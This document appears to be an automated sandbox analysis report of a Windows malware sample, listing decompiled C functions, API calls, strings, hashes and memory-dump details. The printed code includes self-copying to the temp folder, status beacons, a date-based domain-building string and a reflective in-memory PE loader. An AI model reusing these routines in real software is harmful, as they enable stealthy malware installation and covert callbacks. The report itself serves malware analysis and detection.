				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x27c);
				_push( *((intOrPtr*)(_t71 - 0x10)));
				E1000CA40(__ebx, __edi, __esi, _t78);
				 *((intOrPtr*)(_t71 - 0x2fc)) = E10001160(_t71 - 0x298, _t78, ".com/");
				 *((intOrPtr*)(_t71 - 0x300)) =  *((intOrPtr*)(_t71 - 0x2fc));
				 *((char*)(_t71 - 4)) = 0xc;
				E10001A90(_t71 - 0x148,  *((intOrPtr*)(_t71 - 0x300)));
				 *((char*)(_t71 - 4)) = 0;
				E100011A0(_t71 - 0x298);
				E10001110( *((intOrPtr*)(_t71 + 8)), _t78, _t71 - 0x148);
				 *(_t71 - 0x29c) =  *(_t71 - 0x29c) | 0x00000001;
				 *((intOrPtr*)(_t71 - 4)) = 0xffffffff;
				E100011A0(_t71 - 0x148);
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return  *((intOrPtr*)(_t71 + 8));
			}

0x10022bbb
0x10022bbf
0x10022bd1
0x10022be8
0x10022bfa
0x10022c06
0x10022c0c
0x10022c1d
0x10022c22
0x10022c2c
0x10022c34
0x10022c35
0x10022c4d
0x10022c59
0x10022c5f
0x10022c70
0x10022c75
0x10022c7f
0x10022ca0
0x10022cae
0x10022cb4
0x10022cc1
0x10022ccc
0x10022cd6

APIs

_sprintf.LIBCMT ref: 10022BD1

Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A51B
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A52E
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A53A
Part of subcall function 1001A4E0: _strlen.LIBCMT ref: 1001A55D
Part of subcall function 1001A4E0: _sprintf.LIBCMT ref: 1001A5CC
Part of subcall function 1001A4E0: _memset.LIBCMT ref: 1001A616

Part of subcall function 1000CA40: ___sbh_find_block.LIBCMT ref: 1000CA69
Part of subcall function 1000CA40: ___sbh_free_block.LIBCMT ref: 1000CA78
Part of subcall function 1000CA40: HeapFree.KERNEL32(00000000,?,103315C0,Function_0000CA40,10011785,00000000), ref: 1000CAA8
Part of subcall function 1000CA40: GetLastError.KERNEL32(?,?,?,?,?,?,?,103315C0), ref: 1000CAB9

Strings

hellojackma%04d%02d5, xrefs: 10022BC5
.com/, xrefs: 10022C3D

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: _memset$_sprintf_strlen$ErrorFreeHeapLast___sbh_find_block___sbh_free_block
String ID: .com/$hellojackma%04d%02d5
API String ID: 2531412260-1062581820
Opcode ID: b3b5e4a9ef3af28ddef4d7ff14b36f0ad95708faccf5eecfd25703a8a2e53819
Instruction ID: cd4cb29569ec0e2556b74841a2cacae5ea17faf8370a901a59aadef40f2aa25d
Opcode Fuzzy Hash: b3b5e4a9ef3af28ddef4d7ff14b36f0ad95708faccf5eecfd25703a8a2e53819
Instruction Fuzzy Hash: F4211575C011299BEB28DB64CC55BEEB7B4EF48380F5081E9E51D63251EB306B84CF51

Uniqueness

Uniqueness Score: -1.00%

Function 10002760, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E10002760(void* __eflags) {
				intOrPtr _v8;
				intOrPtr _v16;
				char _v56;
				char _v84;
				void* _t14;
				intOrPtr _t20;

				_push(0xffffffff);
				_push(E10023468);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t20;
				E10001160( &_v84, __eflags, "vector<T> too long");
				_v8 = 0;
				E10001ED0( &_v56,  &_v84);
				E1000EC4B( &_v56, 0x10331ba8);
				_v8 = 0xffffffff;
				_t14 = E100011A0( &_v84);
				 *[fs:0x0] = _v16;
				return _t14;
			}

0x10002763
0x10002765
0x10002770
0x10002771
0x10002783
0x10002788
0x10002796
0x100027a4
0x100027a9
0x100027b3
0x100027bb
0x100027c5

APIs

std::bad_exception::bad_exception.LIBCMTD ref: 10002796
__CxxThrowException@8.LIBCMT ref: 100027A4

Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331B50,103352E0), ref: 1000EC8B

Strings

vector<T> too long, xrefs: 1000277B

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionException@8RaiseThrowstd::bad_exception::bad_exception
String ID: vector<T> too long
API String ID: 1843230569-3788999226
Opcode ID: a619a39a7f4f0357af5b7168be1687b30b05c1c7210f01123cebc4e2a9fbb790
Instruction ID: 905b05d582108690ac10a73c09608c56e8cb02dbeb18c8e8bec9c22668189d51
Opcode Fuzzy Hash: a619a39a7f4f0357af5b7168be1687b30b05c1c7210f01123cebc4e2a9fbb790
Instruction Fuzzy Hash: B8F034B5810548ABDB18DBD4DD82BDEB738EB057A0F504668B512666C4EB346A05CB90

Uniqueness

Uniqueness Score: -1.00%

Function 1000443C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000443C(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t20;
				intOrPtr* _t23;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0x44);
				E1000F06B(E10022FB8, __ebx, __edi, __esi);
				E10001160(_t25 - 0x28, _t27, "invalid string position");
				_t2 = _t25 - 4;
				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
				_t20 = _t25 - 0x50;
				E10001DF0(_t20,  *_t2, _t25 - 0x28);
				 *((intOrPtr*)(_t25 - 0x50)) = 0x100242c8;
				E1000EC4B(_t25 - 0x50, 0x10331558);
				asm("int3");
				_push(__esi);
				_t23 = _t20;
				E10001F50(_t20,  *((intOrPtr*)(_t26 + 8)));
				 *_t23 = 0x100242c8;
				return _t23;
			}

0x1000443c
0x1000443c
0x10004443
0x10004450
0x10004455
0x10004455
0x1000445d
0x10004460
0x1000446e
0x10004475
0x1000447a
0x1000447b
0x10004480
0x10004482
0x10004487
0x10004490

APIs

__EH_prolog3.LIBCMT ref: 10004443
__CxxThrowException@8.LIBCMT ref: 10004475

Part of subcall function 1000EC4B: RaiseException.KERNEL32(?,?,1000CCA2,100019D3,?,?,?,?,1000CCA2,100019D3,10331B50,103352E0), ref: 1000EC8B

Part of subcall function 10001F50: std::exception::exception.LIBCMT ref: 10001F73

Strings

invalid string position, xrefs: 10004448

Memory Dump Source

Source File: 00000000.00000002.375368869.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.375350516.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.375538711.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376469298.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.376481695.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.376487113.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ExceptionException@8H_prolog3RaiseThrowstd::exception::exception
String ID: invalid string position
API String ID: 2977319401-1799206989
Opcode ID: 425839f80723953430c3c2f49888e2462970fb45d85aa7fe8659882eeb4357a4
Instruction ID: f47953e82ff53cff568e2d9dd22296eb8b1e5e8ba258ef67d8cf7bd965a875fe
Opcode Fuzzy Hash: 425839f80723953430c3c2f49888e2462970fb45d85aa7fe8659882eeb4357a4
Instruction Fuzzy Hash: 3DE06DB5500168EBE704DBD4EC41ADEB778EF44391FC2092AF205A7149CF75A909CB64

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 26FF190E7AE0F7C7.exe PID: 6676 Parent PID: 6336 26FF190E7AE0F7C7.exeCOMMON

Executed Functions

Function 10020600, Relevance: 40.4, APIs: 10, Strings: 13, Instructions: 176
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E10020600(void* __ebx, void* __edi, void* __eflags) {
				int _v8;
				intOrPtr _v16;
				char _v44;
				char _v311;
				char _v312;
				char _v575;
				char _v576;
				long _v580;
				intOrPtr _v584;
				intOrPtr _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				intOrPtr _v600;
				intOrPtr _v604;
				intOrPtr _v608;
				intOrPtr _v612;
				intOrPtr _v616;
				intOrPtr _v620;
				intOrPtr _v624;
				intOrPtr _v628;
				void* __esi;
				void* _t46;
				int _t47;
				void* _t56;
				void* _t57;
				intOrPtr _t73;
				int _t75;
				int _t77;
				void* _t101;
				intOrPtr _t104;
				void* _t108;
				void* _t109;
				void* _t111;
				intOrPtr _t114;
				void* _t115;
				intOrPtr _t116;
				intOrPtr _t118;
				intOrPtr _t120;
				void* _t125;

				_t125 = __eflags;
				_t100 = __edi;
				_t82 = __ebx;
				_push(0xffffffff);
				_push(E100233D5);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t104;
				_push(_t101);
				E1001FDA0();
				_v312 = 0;
				E1000CF80(__edi,  &_v311, 0, 0x103);
				GetModuleFileNameA(0,  &_v312, 0x104);
				E1001A660(__ebx, _t100, _t101, _t125,  &_v44); // executed
				_v8 = 0;
				_t46 = E10001A50( &_v312, E100011E0( &_v44));
				_t108 = _t104 - 0x264 + 0x18;
				_t126 = _t46;
				if(_t46 == 0) {
					_t47 = E1001A150("Global\\exist_sign__install_r3");
					_t109 = _t108 + 4;
					__eflags = _t47;
					if(_t47 == 0) {
						_v576 = 0;
						E1000CF80(_t100,  &_v575, 0, 0x103);
						GetTempPathA(0x104,  &_v576);
						E1000CDB3( &_v576,  &_v576, 0x104, E100011E0( &_v44));
						_t111 = _t109 + 0x18;
						CopyFileA( &_v312,  &_v576, 0);
						_v580 = GetTickCount();
						while(1) {
							_t56 = E1001A1D0( &_v312);
							_t102 = _t56;
							_t57 = E1001A1D0( &_v576);
							_t111 = _t111 + 8;
							__eflags = _t56 - _t57;
							if(__eflags == 0) {
								break;
							}
							Sleep(0x3e8);
							__eflags = GetTickCount() - _v580 - 0x7530;
							if(__eflags <= 0) {
								continue;
							} else {
							}
							break;
						}
						E1001FE40();
						E10020020(_t82, _t100, _t102, __eflags, "install", "installp3", "-0.35", "52.0", "exe");
						_t114 = _t111 + 0x14 - 0x1c;
						_t89 = _t114;
						_v588 = _t114;
						_v612 = E10001160(_t114, __eflags, "status=main_start");
						E100202C0(_t82, _t100, _t102, __eflags);
						_t115 = _t114 + 0x1c;
						__eflags = PathFileExistsA("C:\\hijack");
						if(__eflags != 0) {
							L15:
							_t116 = _t115 - 0x1c;
							_v592 = _t116;
							_v616 = E10001160(_t116, __eflags, "status=check_debug");
							E100202C0(_t82, _t100, _t102, __eflags);
							_t118 = _t116 + 0x1c - 0x1c;
							_v596 = _t118;
							_v620 = E10001160(_t118, __eflags, "installp3");
							E1001FF30(_t82, _t100, _t102, __eflags);
							_t120 = _t118 + 0x1c - 0x1c;
							_v600 = _t120;
							_v624 = E10001160(_t120, __eflags, "installp3");
							E1001FE50(_t82, _t100, _t102, __eflags);
							_v604 = _t120 + 0x1c - 0x1c;
							_v628 = E10001160(_t120 + 0x1c - 0x1c, __eflags, "status=main_over");
							E100202C0(_t82, _t100, _t102, __eflags);
						} else {
							E1001A100();
							_t75 = E1001A110(_t89);
							__eflags = _t75;
							if(_t75 == 0) {
								L12:
							} else {
								__eflags = E10019D70();
								if(__eflags == 0) {
									_t77 = E1001FA90(_t82, _t100, _t102, __eflags, 0x3e8, 0);
									_t115 = _t115 + 8;
									__eflags = _t77;
									if(__eflags != 0) {
										goto L15;
									} else {
									}
								} else {
									goto L12;
								}
							}
						}
					} else {
					}
					E1001A2C0();
					_v608 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v608;
				} else {
					E10020BC0(__ebx, _t100, _t101, _t126, "52.0"); // executed
					_v584 = 1;
					_v8 = 0xffffffff;
					E100011A0( &_v44);
					_t73 = _v584;
				}
				 *[fs:0x0] = _v16;
				return _t73;
			}

0x10020600
0x10020600
0x10020600
0x10020603
0x10020605
0x10020610
0x10020611
0x1002061e
0x1002061f
0x10020624
0x10020639
0x1002064f
0x10020659
0x10020661
0x10020678
0x1002067d
0x10020680
0x10020682
0x100206bf
0x100206c4
0x100206c7
0x100206c9
0x100206d0
0x100206e5
0x100206f9
0x10020714
0x10020719
0x1002072c
0x10020738
0x1002073e
0x10020745
0x1002074d
0x10020756
0x1002075b
0x1002075e
0x10020760
0x00000000
0x00000000
0x10020767
0x10020779
0x1002077e
0x00000000
0x00000000
0x10020780
0x00000000
0x1002077e
0x10020784
0x100207a2
0x100207aa
0x100207ad
0x100207af
0x100207bf
0x100207c5
0x100207ca
0x100207d8
0x100207da
0x10020810
0x10020810
0x10020815
0x10020825
0x1002082b
0x10020833
0x10020838
0x10020848
0x1002084e
0x10020856
0x1002085b
0x1002086b
0x10020871
0x1002087e
0x1002088e
0x10020894
0x100207dc
0x100207dc
0x100207e1
0x100207e6
0x100207e8
0x100207f3
0x100207ea
0x100207ef
0x100207f1
0x100207ff
0x10020804
0x10020807
0x10020809
0x00000000
0x00000000
0x1002080b
0x00000000
0x00000000
0x00000000
0x100207f1
0x100207e8
0x00000000
0x100206cb
0x1002089c
0x100208a1
0x100208ab
0x100208b5
0x100208ba
0x10020684
0x10020689
0x10020691
0x1002069b
0x100206a5
0x100206aa
0x100206aa
0x100208c3
0x100208ce

APIs

_memset.LIBCMT ref: 10020639
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002064F

Part of subcall function 1001A660: _memset.LIBCMT ref: 1001A6B1
Part of subcall function 1001A660: GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1001A6C7
Part of subcall function 1001A660: _sprintf.LIBCMT ref: 1001A705

Strings

status=check_debug, xrefs: 1002081B
Global\exist_sign__install_r3, xrefs: 100206BA
status=main_start, xrefs: 100207B5
52.0, xrefs: 10020684
installp3, xrefs: 10020861
install, xrefs: 1002079D
C:\hijack, xrefs: 100207CD
-0.35, xrefs: 10020793
status=main_over, xrefs: 10020884
installp3, xrefs: 1002083E
installp3, xrefs: 10020798
exe, xrefs: 10020789
52.0, xrefs: 1002078E

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: FileModuleName_memset$_sprintf
String ID: -0.35$52.0$52.0$C:\hijack$Global\exist_sign__install_r3$exe$install$installp3$installp3$installp3$status=check_debug$status=main_over$status=main_start
API String ID: 3079340674-1925098667
Opcode ID: 37e24f1faf9966a3292e05215ae01ab4257fcd32c16354fb16f3a48bbb36be73
Instruction ID: caf40b379714e25ea3a6c609e0c5d5b05eb5473e79917ee57069ed979baade96
Opcode Fuzzy Hash: 37e24f1faf9966a3292e05215ae01ab4257fcd32c16354fb16f3a48bbb36be73
Instruction Fuzzy Hash: 2D5191B5D003189BEB10FBA4DC4ABDD7675EB10384F5401A5FA0966183EF75AB84CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 1001A1D0, Relevance: 3.0, APIs: 2, Instructions: 21
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E1001A1D0(CHAR* _a4) {
				struct _WIN32_FIND_DATAA _v324;
				intOrPtr _v328;
				void* _v332;
				void* _t11;

				_v328 = 0;
				_t11 = FindFirstFileA(_a4,  &_v324); // executed
				_v332 = _t11;
				if(_v332 != 0xffffffff) {
					_v328 = _v324.nFileSizeLow;
				}
				FindClose(_v332); // executed
				return _v328;
			}

0x1001a1d9
0x1001a1ee
0x1001a1f4
0x1001a201
0x1001a209
0x1001a209
0x1001a216
0x1001a225

APIs

FindFirstFileA.KERNEL32(1001A6D9,?), ref: 1001A1EE
FindClose.KERNEL32(000000FF), ref: 1001A216

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
Instruction ID: d31bde6dcc0951e355ad99ae7a1c5ee3f3ec40d99bb51e99ff820f39f399f313
Opcode Fuzzy Hash: 286baa16cd583546fe3035f76e659778872b80ee5ac4cf2322355d765b363de7
Instruction Fuzzy Hash: 65F0A57590022C9BDB70DF64DD88BDDB7B8AB08310F1002D4E91DA32A0DB30AAD58F51

Uniqueness

Uniqueness Score: -1.00%

Function 1001B680, Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 350
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E1001B680(void* __ebx, void* __edi, void* __esi, signed short* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed short* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				_Unknown_base(*)()* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v68;
				char _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr* _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				void* _t170;
				void* _t173;
				void* _t182;
				intOrPtr _t184;
				void* _t194;
				void* _t203;
				void* _t206;
				void* _t207;
				void* _t209;
				intOrPtr _t220;
				intOrPtr _t225;
				void* _t239;
				intOrPtr _t311;
				void* _t326;
				void* _t327;
				void* _t328;
				void* _t329;
				void* _t330;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t337;
				void* _t338;
				void* _t339;

				_t327 = __esi;
				_t326 = __edi;
				_t239 = __ebx;
				_v76 = 0;
				_v20 = 0;
				_v28 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "GetNativeSystemInfo");
				_t170 = E1001AEA0(_a8, 0x40);
				_t329 = _t328 + 8;
				if(_t170 != 0) {
					_v16 = _a4;
					if(( *_v16 & 0x0000ffff) == 0x5a4d) {
						_t9 =  &(_v16[0x1e]); // 0xc707ebe8
						_t173 = E1001AEA0(_a8,  *_t9 + 0xf8);
						_t330 = _t329 + 8;
						if(_t173 != 0) {
							_t13 =  &(_v16[0x1e]); // 0xc707ebe8
							_v84 = _a4 +  *_t13;
							if( *_v84 == 0x4550) {
								if(( *(_v84 + 4) & 0x0000ffff) == 0x14c) {
									if(( *(_v84 + 0x38) & 0x00000001) == 0) {
										_v88 = _v84 + ( *(_v84 + 0x14) & 0x0000ffff) + 0x18;
										_v36 =  *(_v84 + 0x38);
										_v12 = 0;
										while(_v12 < ( *(_v84 + 6) & 0x0000ffff)) {
											if( *((intOrPtr*)(_v88 + 0x10)) != 0) {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) +  *((intOrPtr*)(_v88 + 0x10));
											} else {
												_v92 =  *((intOrPtr*)(_v88 + 0xc)) + _v36;
											}
											if(_v92 > _v20) {
												_v20 = _v92;
											}
											_v12 = _v12 + 1;
											_v88 = _v88 + 0x28;
										}
										_v28( &_v72);
										_v32 = E1001AEE0( *((intOrPtr*)(_v84 + 0x50)), _v68);
										_t182 = E1001AEE0(_v20, _v68);
										_t332 = _t330 + 0x10;
										if(_v32 == _t182) {
											_t184 = _a12( *((intOrPtr*)(_v84 + 0x34)), _v32, 0x3000, 4, _a32);
											_t333 = _t332 + 0x14;
											_v24 = _t184;
											if(_v24 != 0) {
												L26:
												_v76 = HeapAlloc(GetProcessHeap(), 8, 0x40);
												if(_v76 != 0) {
													 *((intOrPtr*)(_v76 + 4)) = _v24;
													asm("sbb ecx, ecx");
													 *(_v76 + 0x14) =  ~( ~( *(_v84 + 0x16) & 0x2000));
													 *((intOrPtr*)(_v76 + 0x1c)) = _a12;
													 *((intOrPtr*)(_v76 + 0x20)) = _a16;
													 *((intOrPtr*)(_v76 + 0x24)) = _a20;
													 *((intOrPtr*)(_v76 + 0x28)) = _a24;
													 *((intOrPtr*)(_v76 + 0x2c)) = _a28;
													 *((intOrPtr*)(_v76 + 0x34)) = _a32;
													 *((intOrPtr*)(_v76 + 0x3c)) = _v68;
													_t194 = E1001AEA0(_a8,  *((intOrPtr*)(_v84 + 0x54)));
													_t334 = _t333 + 8;
													if(_t194 != 0) {
														_v8 = _a12(_v24,  *((intOrPtr*)(_v84 + 0x54)), 0x1000, 4, _a32);
														E1000D1F0(_t239, _t326, _t327, _v8, _v16,  *((intOrPtr*)(_v84 + 0x54)));
														_t121 =  &(_v16[0x1e]); // 0xc707ebe8
														 *_v76 = _v8 +  *_t121;
														 *((intOrPtr*)( *_v76 + 0x34)) = _v24;
														_t203 = E1001B360(_t239, _t326, _t327, _a4, _a8, _v84, _v76); // executed
														_t337 = _t334 + 0x30;
														if(_t203 != 0) {
															_t311 =  *((intOrPtr*)( *_v76 + 0x34)) -  *((intOrPtr*)(_v84 + 0x34));
															_v80 = _t311;
															if(_t311 == 0) {
																 *((intOrPtr*)(_v76 + 0x18)) = 1;
															} else {
																_t220 = E1001B120(_v76, _v80);
																_t337 = _t337 + 8;
																 *((intOrPtr*)(_v76 + 0x18)) = _t220;
															}
															_t206 = E1001ABC0(_v76); // executed
															_t338 = _t337 + 4;
															if(_t206 != 0) {
																_t207 = E1001B4F0(_v76); // executed
																_t339 = _t338 + 4;
																if(_t207 != 0) {
																	_t209 = E1001ADE0(_v76);
																	_t339 = _t339 + 4;
																	if(_t209 != 0) {
																		if( *((intOrPtr*)( *_v76 + 0x28)) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = 0;
																			L49:
																			return _v76;
																		}
																		if( *(_v76 + 0x14) == 0) {
																			 *((intOrPtr*)(_v76 + 0x38)) = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																			L47:
																			goto L49;
																		}
																		_v100 = _v24 +  *((intOrPtr*)( *_v76 + 0x28));
																		_v96 = _v100(_v24, 1, 0);
																		if(_v96 != 0) {
																			 *((intOrPtr*)(_v76 + 0x10)) = 1;
																			goto L47;
																		}
																		SetLastError(0x45a);
																		L50:
																		E1001A9C0(_v76);
																		return 0;
																	}
																	goto L50;
																}
																goto L50;
															}
															goto L50;
														}
														goto L50;
													}
													goto L50;
												}
												_a16(_v24, 0, 0x8000, _a32);
												SetLastError(0xe);
												return 0;
											}
											_t225 = _a12(0, _v32, 0x3000, 4, _a32);
											_t333 = _t333 + 0x14;
											_v24 = _t225;
											if(_v24 != 0) {
												goto L26;
											}
											SetLastError(0xe);
											return 0;
										}
										SetLastError(0xc1);
										return 0;
									}
									SetLastError(0xc1);
									return 0;
								}
								SetLastError(0xc1);
								return 0;
							}
							SetLastError(0xc1);
							return 0;
						}
						return 0;
					}
					SetLastError(0xc1);
					return 0;
				}
				return 0;
			}

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 1001B69E
GetProcAddress.KERNEL32(00000000), ref: 1001B6A5

Part of subcall function 1001AEA0: SetLastError.KERNEL32(0000000D,?,1001B6B9,10020924,00000040), ref: 1001AEAD

SetLastError.KERNEL32(000000C1), ref: 1001B6DF

Strings

kernel32.dll, xrefs: 1001B699
GetNativeSystemInfo, xrefs: 1001B694

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.429077803.0000000010339000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429089279.000000001033A000.00000004.00000001.sdmp Download File

Similarity

API ID: ErrorLast$AddressHandleModuleProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 1762409328-192647395
Opcode ID: 3eee6498037c2fe8ffe83811f43bb82ec4f96475871352c36a7dddd69a664305
Instruction ID: 694ab680ebfe8ef0636185c130ad71dc1cebcbc5687b108a2a2fd76037c7b5c4
Opcode Fuzzy Hash: 3eee6498037c2fe8ffe83811f43bb82ec4f96475871352c36a7dddd69a664305
Instruction Fuzzy Hash: 0AE1F874A00609DFDB04CFA4C884AAEBBB1FF88305F648558E905AF385D774E982CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1000E96E, Relevance: 25.6, APIs: 17, Instructions: 90
memoryCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E1000E96E() {
				int _t13;
				long _t19;
				signed int _t20;
				signed int _t21;
				signed int _t22;
				signed int _t23;
				signed int _t27;
				signed int _t28;
				signed int _t32;
				signed int _t33;
				void* _t37;
				long _t39;
				void* _t40;
				signed int _t47;
				struct _OSVERSIONINFOA* _t49;
				void* _t51;

				_t37 = GetProcessHeap;
				_t49 = HeapAlloc(GetProcessHeap(), 0, 0x94);
				if(_t49 != 0) {
					_t49->dwOSVersionInfoSize = 0x94;
					_t13 = GetVersionExA(_t49);
					__eflags = _t13;
					_push(_t49);
					_push(0);
					if(_t13 != 0) {
						 *(_t51 + 0xc) = _t49->dwPlatformId;
						 *(_t51 + 0x10) = _t49->dwMajorVersion;
						 *(_t51 - 4) = _t49->dwMinorVersion;
						_t47 = _t49->dwBuildNumber & 0x00007fff;
						HeapFree(GetProcessHeap(), ??, ??);
						_t19 =  *(_t51 + 0xc);
						__eflags = _t19 - 2;
						if(_t19 != 2) {
							_t47 = _t47 | 0x00008000;
							__eflags = _t47;
						}
						_t39 =  *(_t51 - 4);
						 *0x1033548c = _t19;
						_t20 =  *(_t51 + 0x10);
						_t44 = (_t20 << 8) + _t39;
						 *0x10335494 = (_t20 << 8) + _t39;
						 *0x10335498 = _t20;
						 *0x1033549c = _t39;
						 *0x10335490 = _t47;
						_t21 = E1000F81F(1);
						__eflags = _t21;
						_pop(_t40);
						if(_t21 == 0) {
							goto L1;
						} else {
							_t23 = E10011936(_t37);
							__eflags = _t23;
							if(_t23 != 0) {
								E100150E1();
								 *0x10338f64 = GetCommandLineA();
								 *0x103352fc = E10014FAC(); // executed
								_t27 = E100149F4(_t37, _t44, _t47, _t49, __eflags); // executed
								__eflags = _t27;
								if(_t27 >= 0) {
									_t28 = E10014EF3(_t40);
									__eflags = _t28;
									if(_t28 < 0) {
										L15:
										E10014C34();
										goto L10;
									} else {
										_t32 = E10014C80(_t40, _t44);
										__eflags = _t32;
										if(_t32 < 0) {
											goto L15;
										} else {
											_t33 = E10011BD6(_t37, _t47, _t49, _t51, 0);
											__eflags = _t33;
											if(_t33 != 0) {
												goto L15;
											} else {
												 *0x103352f8 =  *0x103352f8 + 1;
												_t22 = 1;
												__eflags = 1;
											}
										}
									}
								} else {
									L10:
									E10011620();
									goto L8;
								}
							} else {
								L8:
								E1000F879();
								goto L1;
							}
						}
					} else {
						HeapFree(GetProcessHeap(), ??, ??);
						goto L1;
					}
				} else {
					L1:
					_t22 = 0;
				}
				return _t22;
			}

APIs

GetProcessHeap.KERNEL32(00000000,00000094), ref: 1000E97C
HeapAlloc.KERNEL32(00000000), ref: 1000E97F
GetVersionExA.KERNEL32(00000000), ref: 1000E995
GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000E9A2
HeapFree.KERNEL32(00000000), ref: 1000E9A5
GetProcessHeap.KERNEL32(00000000,00000000), ref: 1000E9C8
HeapFree.KERNEL32(00000000), ref: 1000E9CB
__heap_term.LIBCMT ref: 1000EA21
__RTC_Initialize.LIBCMT ref: 1000EA2B
GetCommandLineA.KERNEL32 ref: 1000EA30
___crtGetEnvironmentStringsA.LIBCMT ref: 1000EA3B
__ioinit.LIBCMT ref: 1000EA45
__mtterm.LIBCMT ref: 1000EA4E
__setargv.LIBCMT ref: 1000EA55
__setenvp.LIBCMT ref: 1000EA5E
__cinit.LIBCMT ref: 1000EA69
__ioterm.LIBCMT ref: 1000EA7E

Memory Dump Source

Source File: 00000006.00000002.428439835.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.428427110.0000000010000000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.428502937.0000000010024000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.429061478.0000000010334000.00000004.00000001.sdmp Download File
